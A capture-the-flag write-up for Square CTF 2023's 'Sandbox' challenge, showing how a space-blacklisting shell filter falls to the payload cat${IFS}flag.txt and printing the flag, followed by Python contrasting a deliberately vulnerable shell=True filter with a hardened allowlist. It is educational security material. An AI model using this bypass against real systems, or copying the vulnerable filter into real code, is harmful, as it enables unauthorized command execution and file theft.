Sandbox [Square CTF 2023]

pwn
writeup by: H0N3YP0T

Challenge Description

I “made” “a” “python” “sandbox” """" nc 184.72.87.9 8008

Intuition

It seems the server blacklists the space character, so I am not able to cat flag.txt.

Solution

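Work around the space filter by replacing the space with ${IFS}, the shell's internal field separator variable, which the shell expands to whitespace when it runs the command: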

$ nc 184.72.87.9 8008
Hi! Welcome to the kidz corner sandbox! we made it super safe in here - you can execute whatever command you want, but only one word at a time so you can't do anything too dangerous, like steal our flags!
cat${IFS}flag.txt
flag{did_you_use_ifs_or_python_let_me_know_down_in_the_comments}
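
Why the one-word check fails, and a stricter design, as an added example that is not the challenge's actual server code: naive_sandbox is an assumed reconstruction of the filter (reject a literal space, then pass the string to a shell), and hardened_sandbox, the ALLOWED set and the sample flag file are hypothetical names and values constructed here.

```python
import os
import subprocess
import tempfile

# Hypothetical allowlist of bare commands the sandbox is willing to run.
ALLOWED = {"ls", "pwd", "whoami"}


def naive_sandbox(user_input, cwd):
    """Assumed reconstruction: block literal spaces, then let a shell parse the input."""
    if " " in user_input:
        return "one word at a time, please"
    # The shell expands ${IFS} and field-splits the result *after* the check above,
    # so "one word" of input still becomes a command plus an argument.
    result = subprocess.run(user_input, shell=True, cwd=cwd,
                            capture_output=True, text=True)
    return result.stdout.strip()


def hardened_sandbox(user_input, cwd):
    """Exact-match allowlist and no shell: nothing in the input is ever expanded."""
    if user_input not in ALLOWED:
        return "command not allowed"
    result = subprocess.run([user_input], shell=False, cwd=cwd,
                            capture_output=True, text=True)
    return result.stdout.strip()


def demo():
    """Run both sandboxes against a constructed flag file in a temp directory."""
    with tempfile.TemporaryDirectory() as workdir:
        with open(os.path.join(workdir, "flag.txt"), "w") as fh:
            fh.write("flag{constructed_sample}\n")  # constructed value, not the real flag
        payload = "cat${IFS}flag.txt"  # the input used in the session above
        return {
            "naive_space": naive_sandbox("cat flag.txt", workdir),
            "naive_ifs": naive_sandbox(payload, workdir),
            "hardened_ifs": hardened_sandbox(payload, workdir),
            "hardened_ls": hardened_sandbox("ls", workdir),
        }


if __name__ == "__main__":
    for name, output in demo().items():
        print(f"{name}: {output}")
```

The character filter inspects the string before the shell interprets it, which is why filtering input that is later handed to a shell is fragile; the allowlist version never invokes a shell at all.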

Flag

flag{did_you_use_ifs_or_python_let_me_know_down_in_the_comments}